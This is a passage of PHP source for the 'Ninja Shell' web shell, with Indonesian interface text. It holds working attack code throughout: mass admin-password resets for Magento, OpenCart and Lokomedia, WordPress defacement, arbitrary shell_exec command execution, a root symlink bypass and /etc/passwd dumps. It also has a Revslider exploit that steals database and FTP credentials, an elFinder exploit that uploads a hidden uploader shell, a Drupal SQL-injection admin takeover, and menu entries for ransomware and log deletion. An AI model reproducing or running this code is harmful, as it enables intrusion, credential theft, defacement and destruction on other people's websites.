mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM {$option} WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if ($target == '') { $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "<br>"; } else { $url_target = "Login => <a href='{$target}/admin/' target='_blank'><u>{$target}/admin/</u></a><br>"; } $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE user_id='{$id}'"); print "Config => " . $file_conf . "<br>"; print "CMS => Magento<br>"; print $url_target; if (!$update or !$conn or !$db) { print "Status => " . color(1, 1, mysql_error()) . "<br><br>"; } else { print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "<br><br>"; } mysql_close($conn); } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) { $dbhost = getValue($config, "'DB_HOSTNAME', '", "'"); $dbuser = getValue($config, "'DB_USERNAME', '", "'"); $dbpass = getValue($config, "'DB_PASSWORD', '", "'"); $dbname = getValue($config, "'DB_DATABASE', '", "'"); $dbprefix = getValue($config, "'DB_PREFIX', '", "'"); $prefix = $dbprefix . "user"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = getValue($config, "HTTP_SERVER', '", "'"); if ($target == '') { $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "<br>"; } else { $url_target = "Login => <a href='{$target}' target='_blank'><u>{$target}</u></a><br>"; } $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE user_id='{$id}'"); print "Config => " . $file_conf . "<br>"; print "CMS => OpenCart<br>"; print $url_target; if (!$update or !$conn or !$db) { print "Status => " . color(1, 1, mysql_error()) . "<br><br>"; } else { print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "<br><br>"; } mysql_close($conn); } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $config)) { $dbhost = getValue($config, "server = "", """); $dbuser = getValue($config, "username = "", """); $dbpass = getValue($config, "password = "", """); $dbname = getValue($config, "database = "", """); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$option} ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if ($target == '') { $target2 = $result[url]; $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "<br>"; if ($target2 == '') { $url_target2 = "Login => " . color(1, 1, "Cant't get domain name") . "<br>"; } else { $cek_login3 = file_get_contents("{$target2}/adminweb/"); $cek_login4 = file_get_contents("{$target2}/lokomedia/adminweb/"); if (preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => <a href='{$target2}/adminweb' target='_blank'><u>{$target2}/adminweb</u></a><br>"; } elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => <a href='{$target2}/lokomedia/adminweb' target='_blank'><u>{$target2}/lokomedia/adminweb</u></a><br>"; } else { $url_target2 = "Login => <a href='{$target2}' target='_blank'><u>{$target2}</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } } else { $cek_login = file_get_contents("{$target}/adminweb/"); $cek_login2 = file_get_contents("{$target}/lokomedia/adminweb/"); if (preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => <a href='{$target}/adminweb' target='_blank'><u>{$target}/adminweb</u></a><br>"; } elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => <a href='{$target}/lokomedia/adminweb' target='_blank'><u>{$target}/lokomedia/adminweb</u></a><br>"; } else { $url_target = "Login => <a href='{$target}' target='_blank'><u>{$target}</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE level='admin'"); print "Config => " . $file_conf . "<br>"; print "CMS => Lokomedia<br>"; if (preg_match("/Can't get domain name/", $url_target)) { print $url_target2; } else { print $url_target; } if (!$update or !$conn or !$db) { print "Status => " . color(1, 1, mysql_error()) . "<br><br>"; } else { print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "<br><br>"; } mysql_close($conn); } } } } else { print "<center>
\x9 <h2>Mass User Changer Ninja Shell</h2>
\x9\x9\x9<form method='post'>\xa \x9 \x9<input type='radio' name='config_type' value='dir' checked>DIR Config <input type='radio' name='config_type' value='link'>LINK Config<br><br>\xa\x9\x9\x9\x9<input type='text' size='50' name='config_dir' style='width:250px;' height = '10' class='form-control' value='" . path() . "'><br><br>\xa\x9 Set User & Pass: <br>\xa\x9 \x9<input type='text' style='width:250px;' height = '10' class='form-control' name='user_baru' value='Exorcism1337' placeholder='user_baru'><br>
\x9<input type='text' style='width:250px;' height = '10' class='form-control' name='pass_baru' value='Exorcism1337' placeholder='pass_baru'><br>\xa \x9\x9 <input class = 'form-control' style='width: 215px; margin: 5px auto;' type='submit' name='hajar' value='Hajar!'>
\x9\x9</form></center><hr><br>"; } } elseif (isset($_GET[hex("mass_title")])) { echo "<hr><br><center><h2>Mass Title Changer Ninja Shell</h2>\xa<form method='post'>\xaLink Config: <br>\xa<input type='text' class = 'form-control' height='10' name='linkconf' height='10' style='width: 450px;' placeholder='http://website.com/ia_symconf/'><br><br>
<input type='submit' class = 'form-control' height='10' style='width: 450px;' name='gass' value='Hajar!!' class='oke'>
</form></center><hr><br>"; if ($_POST["gass"]) { echo "<center>
<form method='post'>\xaLink Config: <br>\xa<textarea name='link'>"; GrabUrl($_POST["linkconf"], "wordpress"); echo "</textarea><br>ID: <input class = 'form-control' type='text' name='id' value='1'><br>TITLE :<input type='text' name='title' value='Hacked By Index_Attacker'><br>POST CONTENT: <input type='text' name='content' value='Hacked By Index_Attacker'><br>POSTNAME: <input type='text' name='postname' value='HackeD By Index_Attacker'><br>
<input type='submit' style='width: 450px;' name='edittitle' value='Hajar!!'>
</form></center>"; } if ($_POST["edittitle"]) { $title = htmlspecialchars($_POST["title"]); $id = $_POST["id"]; $content = $_POST["content"]; $postname = $_POST["name"]; function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\xd
", $_POST["link"]); foreach ($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config, "DB_HOST', '", "'"); $dbuser = ambilkata($config, "DB_USER', '", "'"); $dbpass = ambilkata($config, "DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "DB_NAME', '", "'"); $dbprefix = ambilkata($config, "table_prefix = '", "'"); $prefix = $dbprefix . "posts"; $option = $dbprefix . "options"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY ID ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM {$option} ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("UPDATE {$prefix} SET post_title='{$title}',post_content='{$content}',post_name='{$postname}',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='{$id}'"); $update .= mysql_query("UPDATE {$option} SET option_value='{$title}' WHERE option_name='blogname' OR option_name='blogdescription'"); echo "<div style='margin: 5px auto;'>"; if ($target == '') { echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> "; } else { echo "URL: <a href='{$target}/?p={$id}' target='_blank'>{$target}/?p={$id}</a> -> "; } if (!$update or !$conn or !$db) { echo "<font color=red>MySQL Error: " . mysql_error() . "</font><br>"; } else { echo "<font color=lime>sukses di ganti.</font><br>"; } echo "</div>"; mysql_close($conn); } } } elseif (isset($_GET[hex("bypass")])) { echo "<hr><br>"; echo "<center><h2>Bypasser Ninja Shell</h2></center><br>"; echo "<form method = 'POST'>
\x9\x9 \x9 <div class = 'row clearfix'>
\x9\x9 \x9\x9<div class = 'col-md-3'>
\x9\x9\x9 \x9<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("bypass-cf") . "' style='width: 250px;' height='10'><center>Bypass CloudFlare</center></a>
\x9\x9\x9\x9\x9\x9</div>
\x9 \x9\x9\x9<div class = 'col-md-3'>
\x9\x9 \x9 \x9<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("bypass-server") . "' style='width: 250px;' height='10'><center>Bypass Server</center></a>
\x9 \x9 </div>\xa \x9\x9\x9\x9<div class = 'col-md-3'>\xa \x9\x9 \x9<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("bypass-vhost") . "' style='width: 250px;' height='10'><center>Bypass Vhost</center></a>\xa\x9\x9 \x9 </div>
\x9 \x9\x9 <div class = 'col-md-3'>\xa\x9 \x9 \x9\x9<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("bypass-passwd") . "' style='width: 250px;' height='10'><center>Bypass Passwd</center></a>\xa\x9\x9\x9 \x9\x9</div>\xa\x9\x9 \x9 </div></form>"; echo "<hr>"; } elseif (isset($_GET[hex("bypass-cf")])) { echo "
\x9\x9\x9\x9\xa\x9\x9 <form method="POST"><br><br><center><hr>\xa \x9 \x9<h2>Bypass CloudFlare Ninja Shell</h2>\xa\x9 \x9<div class = "row clearfix">\xa\x9\x9 \x9<div class= "col-md-4">\xa \x9\x9<select class="form-control" name="krz">\xa\x9\x9\x9 <option>ftp</option>
\x9 <option>direct-conntect</option>\xa \x9 \x9\x9 \x9<option>webmail</option>
\x9 \x9 <option>cpanel</option>
\x9\x9 \x9</select>\xa\x9 \x9 </div>\xa <div class = "col-md-4">\xa\x9\x9\x9\x9<input class="form-control" type="text" name="target" value="url">
\x9 </div>
\x9\x9 <div class = "col-md-4">\xa \x9 <input class="form-control" type="submit" value="Bypass">
\x9\x9 </div>
\x9\x9\x9 </div>
\x9\x9</center>
\x9 <hr><br>\xa\x9\x9 </form>\xa\x9\x9\x9
"; $target = $_POST["target"]; if ($_POST["krz"] == "ftp") { $ftp = gethostbyname("ftp." . "{$target}"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct
\x9 \x9ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$ftp}</font></p>"; } if ($_POST["krz"] == "direct-conntect") { $direct = gethostbyname("direct-connect." . "{$target}"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct \xa\x9 \x9 ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$direct}</font></p>"; } if ($_POST["krz"] == "webmail") { $web = gethostbyname("webmail." . "{$target}"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct \xa \x9\x9\x9ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$web}</font></p>"; } if ($_POST["krz"] == "cpanel") { $cpanel = gethostbyname("cpanel." . "{$target}"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct
\x9 ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$cpanel}</font></p>"; } } elseif (isset($_GET[hex("bypass-server")])) { $dir = path(); ?>
<form action="?dir=<?php echo $dir; ?>
&do=bypassserver" method="post">
<center /><br />
<hr>
<h2>Bypass Server Ninja Shell</h2><br>
<?php print "\xa<form method="POST" action=""><br><center>
<b><font color=white><b><font color="black">Command </font></font></b>
<div class = "col-md-4">
<input name="baba" type="text" class="form-control" style="width:250px;" size="34">
</div>\xa<div class = "col-md-4">\xa<input type="submit" class="form-control" value="Execute!" style="width:350px;">\xa<br>
</div>
</form>
<form method="POST" action=""><strong><b><font color="black">Menu Bypass</font></strong>\xa<select name="liz0" size="1" class="form-control" style="width:250px;">\xa<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">netstat</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>\xa<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>\xa</select> <br><input type="submit" class="form-control" style="width:350px;" value="Bypass!">\xa</form>\xa<hr><br></center>
"; ini_restore("safe_mode"); ini_restore("open_basedir"); $liz0 = shell_exec($_POST[baba]); $liz0zim = shell_exec($_POST[liz0]); $uid = shell_exec("id"); $server = shell_exec("uname -a"); echo "<pre><h4>"; echo $liz0; echo $liz0zim; echo "</h4></pre>"; "</div>"; ?>
<?php } elseif (isset($_GET[hex("bypass-vhost")])) { echo "<hr><form method='POST' action=''>"; echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>"; echo "<center><input type='submit' value='Bypass it' name='Colii' class = 'form-control' style='width:250px;'></center>"; if (isset($_POST["Colii"])) { system("ln -s / Exorcism1337.txt"); $fvckem = "T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw"; $file = fopen(".htaccess", "w+"); $write = fwrite($file, base64_decode($fvckem)); $Bok3p = symlink("/", "Exorcism1337.txt"); $rt = "<br><a href=Exorcism1337.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>\xa Bypassed Successfully</b></font></a>"; echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>{$rt}</center>"; } echo "</form><hr><br>"; } elseif (isset($_GET[hex("bypass-passwd")])) { echo "<hr><center><h2>Bypass Etc/Passwd </h2><br>
<table style="width:50%">
<tr>
<td><form method="post"><input type="submit" class = "form-control" value="System Function" name="syst"></form></td>
<td><form method="post"><input type="submit" class = "form-control" value="Passthru Function" name="passth"></form></td>\xa <td><form method="post"><input type="submit" class = "form-control" value="Exec Function" name="ex"></form></td>\x9
<td><form method="post"><input type="submit" class = "form-control" value="Shell_exec Function" name="shex"></form></td> \x9\xa <td><form method="post"><input type="submit" class = "form-control" value="Posix_getpwuid Function" name="melex"></form></td>\xa</tr></table>\xa<br><hr>
<h2>Bypass User</h2><table style="width:50%"><br>\xa<tr>\xa <td><form method="post"><input type="submit" class = "form-control" value="Awk Program" name="awkuser"></form></td>
<td><form method="post"><input type="submit" class = "form-control" value="System Function" name="systuser"></form></td>
<td><form method="post"><input type="submit" class = "form-control" value="Passthru Function" name="passthuser"></form></td>
<td><form method="post"><input type="submit" class = "form-control" value="Exec Function" name="exuser"></form></td> \x9
<td><form method="post"><input type="submit" class = "form-control" value="Shell_exec Function" name="shexuser"></form></td>
</tr>
</table><br><hr>"; if ($_POST["awkuser"]) { echo "<textarea class='form-control' cols='65' rows='15'>"; echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort"); echo "</textarea><br>"; } if ($_POST["systuser"]) { echo "<textarea class='form-control' cols='65' rows='15'>"; echo system("ls /var/mail"); echo "</textarea><br>"; } if ($_POST["passthuser"]) { echo "<textarea class='form-control' cols='65' rows='15'>"; echo passthru("ls /var/mail"); echo "</textarea><br>"; } if ($_POST["exuser"]) { echo "<textarea class='form-control' cols='65' rows='15'>"; echo exec("ls /var/mail"); echo "</textarea><br>"; } if ($_POST["shexuser"]) { echo "<textarea class='form-control' cols='65' rows='15'>"; echo shell_exec("ls /var/mail"); echo "</textarea><br>"; } if ($_POST["syst"]) { echo "<textarea class='form-control' cols='65' rows='15'>"; echo system("cat /etc/passwd"); echo "</textarea><br><br><b></b><br>"; } if ($_POST["passth"]) { echo "<textarea class='form-control' cols='65' rows='15'>"; echo passthru("cat /etc/passwd"); echo "</textarea><br><br><b></b><br>"; } if ($_POST["ex"]) { echo "<textarea class='form-control' cols='65' rows='15'>"; echo exec("cat /etc/passwd"); echo "</textarea><br><br><b></b><br>"; } if ($_POST["shex"]) { echo "<textarea class='form-control' cols='65' rows='15'>"; echo shell_exec("cat /etc/passwd"); echo "</textarea><br><br><b></b><br>"; } echo "<center>"; if ($_POST["melex"]) { echo "<textarea class='form-control' cols='65' rows='15'>"; for ($uid = 0; $uid < 60000; $uid++) { $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { print "{$val}:"; } print "
"; } } echo "</textarea><br><br>"; } } elseif (isset($_GET[hex("exploiter")])) { echo "<hr><br>"; echo "<center><h2>Exploiter Ninja Shell</h2></center><br>"; echo "<form method = 'POST'>\xa \x9\x9 <div class = 'row clearfix'>
\x9\x9\x9\x9 <div class = 'col-md-3'>\xa\x9\x9\x9 \x9<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("csrf") . "' style='width: 250px;' height='10'><center>CSRF Exploiter</center></a>
\x9\x9\x9\x9 </div>\xa \x9\x9<div class = 'col-md-3'>\xa\x9\x9 \x9\x9\x9<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("revslider") . "' style='width: 250px;' height='10'><center>Revslider Exploiter</center></a>
\x9 \x9 \x9</div>\xa \x9 \x9 <div class = 'col-md-3'>\xa \x9\x9 \x9\x9<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("elfinder") . "' style='width: 250px;' height='10'><center>Elfinder Exploiter</center></a>
\x9\x9\x9 \x9</div>\xa\x9 <div class = 'col-md-3'>\xa\x9\x9 \x9\x9\x9<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("drupal") . "' style='width: 250px;' height='10'><center>Drupal Exploiter</center></a>
\x9 \x9 \x9 </div>\xa
\x9 </div>\xa\x9\x9 \x9 \x9
\x9 \x9\x9\x9 </form>"; echo "<hr>"; } elseif (isset($_GET[hex("csrf")])) { echo "
<hr><br><center><h2 style="font-size:33px;">CSRF Exploiter Ninja Shell</h2><br><br>\xa<font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
<br><br>
<form method="POST" style="font-size:25px;" action= "">\xaURL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px; width:450px;" class = "form-control" required autocomplete = "off"><br>\xaPOST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px; width:250px;" required class = "form-control" autocomplete = "off"><br>
<input style="width:350px;" type="submit" name="d" value="Lock!" class = "form-control">
</form><hr><br>"; $url = $_POST["url"]; $pf = $_POST["pf"]; $d = $_POST["d"]; if ($d) { echo "\xa <h2>Upload Your Files</h2>\xa <form method='post' target='_blank' action='{$url}' enctype='multipart/form-data'><input type='file' name='{$pf}'><input type='submit' name='g' value='Upload'></form>"; } } elseif (isset($_GET[hex("revslider")])) { echo "\xa \xa<center><hr><br>
<h2>Revslider Exploiter Ninja Shell</h2>
<form method='post'>\xa<textarea class='form-control' name='site' cols='50' rows='12'>
http://site.com
http://site2.com
http://site3.com</textarea><br>
<input class='form-control' type='submit' style='width: 150px;' name='sikat' value='Gass!'>
</form></center><hr><br>
"; function findit($mytext, $starttag, $endtag) { $posLeft = stripos($mytext, $starttag) + strlen($starttag); $posRight = stripos($mytext, $endtag, $posLeft + 1); return substr($mytext, $posLeft, $posRight - $posLeft); } error_reporting(0); set_time_limit(0); $ya = $_POST["sikat"]; $co = $_POST["site"]; if ($ya) { $e = explode("\xa", $co); foreach ($e as $bda) { $linkof = "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"; $dn = $bda . $linkof; $file = @file_get_contents($dn); if (eregi("DB_HOST", $file) and !eregi("FTP_USER", $file)) { echo "<center><font face="courier" color=white >----------------------------------------------</font></center>"; echo "<center><font face='courier' color='lime' >" . $bda . "</font></center>"; echo "<font face='courier' color=lime >DB name : </font>" . findit($file, "DB_NAME', '", "');") . "<br>"; echo "<font face='courier' color=lime >DB user : </font>" . findit($file, "DB_USER', '", "');") . "<br>"; echo "<font face='courier' color=lime >DB pass : </font>" . findit($file, "DB_PASSWORD', '", "');") . "<br>"; echo "<font face='courier' color=lime >DB host : </font>" . findit($file, "DB_HOST', '", "');") . "<br>"; } elseif (eregi("DB_HOST", $file) and eregi("FTP_USER", $file)) { echo "<center><font face="courier" color=white >----------------------------------------------</font></center>"; echo "<center><font face='courier' color='lime' >" . $bda . "</font></center>"; echo "<font face='courier' color=lime >FTP user : </font>" . findit($file, "FTP_USER','", "');") . "<br>"; echo "<font face='courier' color=lime >FTP pass : </font>" . findit($file, "FTP_PASS','", "');") . "<br>"; echo "<font face='courier' color=lime >FTP host : </font>" . findit($file, "FTP_HOST','", "');") . "<br>"; } else { echo "<center><font face='courier' color='red' >" . $bda . " ----> not infected </font></center>"; } echo "<center><font face="courier" color=white >----------------------------------------------</font></center>"; } } } elseif (isset($_GET[hex("elfinder")])) { echo "<hr><br>"; echo "<center>"; echo "<h2>ElFinder Mass Exploiter</h2>"; echo "<form method="post">\xaTarget: <br>\xa<textarea class = "form-control" name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize:\xanone;"></textarea><br>
<input class = "form-control" type="submit" name="x" style="width: 150px; height: 35px; margin: 5px;" value="SIKAT!">
</form></center><hr><br>"; function ngirim($url, $isi) { $ch = curl_init("{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $isi); curl_setopt($ch, CURLOPT_COOKIEJAR, "coker_log"); curl_setopt($ch, CURLOPT_COOKIEFILE, "coker_log"); $data3 = curl_exec($ch); return $data3; } $target = explode("\xa", $_POST["target"]); if ($_POST["x"]) { foreach ($target as $korban) { $nama_doang = "Exorcism1337.php"; $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1\xalIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV\xa0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg=="; $decode_isi = base64_decode($isi_nama_doang); $encode = base64_encode($nama_doang); $fp = fopen($nama_doang, "w"); fputs($fp, $decode_isi); echo "[!] <a href='{$korban}' target='_blank'>{$korban}</a> <br>"; echo "# Upload[1] ......<br>"; $url_mkfile = "{$korban}?cmd=mkfile&name={$nama_doang}&target=l1_Lw"; $b = file_get_contents("{$url_mkfile}"); $post1 = array("cmd" => "put", "target" => "l1_{$encode}", "content" => "{$decode_isi}"); $post2 = array("current" => "8ea8853cb93f2f9781e0bf6e857015ea", "upload[]" => "@{$nama_doang}"); $output_mkfile = ngirim("{$korban}", $post1); if (preg_match("/{$nama_doang}/", $output_mkfile)) { echo "<font color='lime'># Upload Sukses 1... => {$nama_doang}<br># Coba buka di ../../elfinder/files/...</font><br><br>"; } else { echo "<font color='red'># Upload Gagal Cok! 1 <br># Uploading 2..</font><br>"; $upload_ah = ngirim("{$korban}?cmd=upload", $post2); if (preg_match("/{$nama_doang}/", $upload_ah)) { echo "<font color='lime'># Upload Sukses 2 => {$nama_doang}<br># Coba buka di ../../elfinder/files/...</font><br><br>"; } else { echo "<font color='red'># Upload Gagal Lagi Cok! 2</font><br><br>"; } } } } } elseif (isset($_GET[hex("drupal")])) { echo "<center><hr><br>"; echo "\xa <h2>Drupal Mass Exploiter</h2><br>\xa \x9<form method='post' action=''>\xa <textarea rows='10'class='form-control' cols='10' name='url'>
\x9http://www.site.com\xa\x9 http://www.site2.com</textarea><br><br>
\x9<input type='submit' class='form-control' style='width:250px;' name='submit' value='SIKAT!'>
\x9</form></center><hr><br>\xa "; $drupal = $_GET["drupal"]; if ($drupal == "drupal") { $filename = $_FILES["file"]["name"]; $filetmp = $_FILES["file"]["tmp_name"]; echo "<div class='mybox'><form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='drupal !' />\xa</form></div>"; move_uploaded_file($filetmp, $filename); } error_reporting(0); if (isset($_POST["submit"])) { function exploit($url) { $post_data = "name[0;update users set name %3D 'Exorcism' , pass %3D '" . urlencode("$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu") . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in"; $params = array("http" => array("method" => "POST", "header" => "Content-Type: application/x-www-form-urlencoded\xa", "content" => $post_data)); $ctx = stream_context_create($params); $data = file_get_contents($url . "/user/login/", null, $ctx); if (stristr($data, "mb_strlen() expects parameter 1 to be string") && $data || stristr($data, "FcUk Crap") && $data) { $fp = fopen("exploited.txt", "a+"); fwrite($fp, "Exploitied User: Exorcism Pass: Exorcism =====> {$url}/user/login"); fwrite($fp, "
"); fwrite($fp, "--------------------------------------------------------------------------------------------------"); fwrite($fp, "\xa"); fclose($fp); echo "<font color='lime'><b>Success:<font color='white'>Exorcism</font> Pass:<font color='white'>Exorcism</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>"; } else { echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>"; } } $urls = explode("
", $_POST["url"]); foreach ($urls as $url) { $url = @trim($url); echo exploit($url); } } } elseif (isset($_GET[hex("auto_tools")])) { echo "<hr><center><h2>Auto Tools Ninja Shell </h2><br>\xa<table style="width:90%">
<tr>
<td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("zone-h") . "><center>Zone H</center></a></td>\xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("defacer-id") . "><center>Defacer ID</center></a></td>\xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("jumping") . "><center>Jumping</center></a></td>\x9\xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("fake-root") . "><center>Fake Root</center></a></td> \xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("adminer") . "><center>Adminer</center></a></td>
</tr>
<tr>\xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("wp-hijack") . "><center>Wp Auto Hijack</center></a></td>\xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("cpanel-reset") . "><center>Cpanel Reset</center></a></td>\xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("zip-menu") . "><center>Zip Menu</center></a></td>\xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("reverse-ip") . "><center>Reverse IP</center></a></td>\xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("rdp") . "><center>K-RDP Shell</center></a></td>\xa</tr>\xa<tr>
<td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("ransomware") . "><center>Ransomware</center></a></td>
<td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("whois") . "><center>WhoIs</center></a></td>\xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("phpinfo") . "><center>Php Info</center></a></td>\x9
<td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("inject-code") . "><center>Inject Code</center></a></td> \xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("db-dump") . "><center>DB Dump</center></a></td>\xa</tr>
<tr>\xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("cp-crack") . "><center>Cpanel Crack</center></a></td>
<td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("smtp-grab") . "><center>SMTP Grabber</center></a></td> \xa <td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("domains") . "><center>Domains Viewer</center></a></td>
<td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("whmcs-decoder") . "><center>WHMCS Decoder</center></a></td>
<td><a class = "form-control ajx" href = ?d=" . hex($d) . "&" . hex("delete-logs") . "><center>Delete Logs</center></a></td>
</tr>\xa</table>
<br><hr>"; } elseif (isset($_GET[hex("zone-h")])) { ?>
<form action="" method="post">
<center>
<hr><br>
<h2>Zone H Submit Ninja Shell</h2>
<u>Defacer :</u>
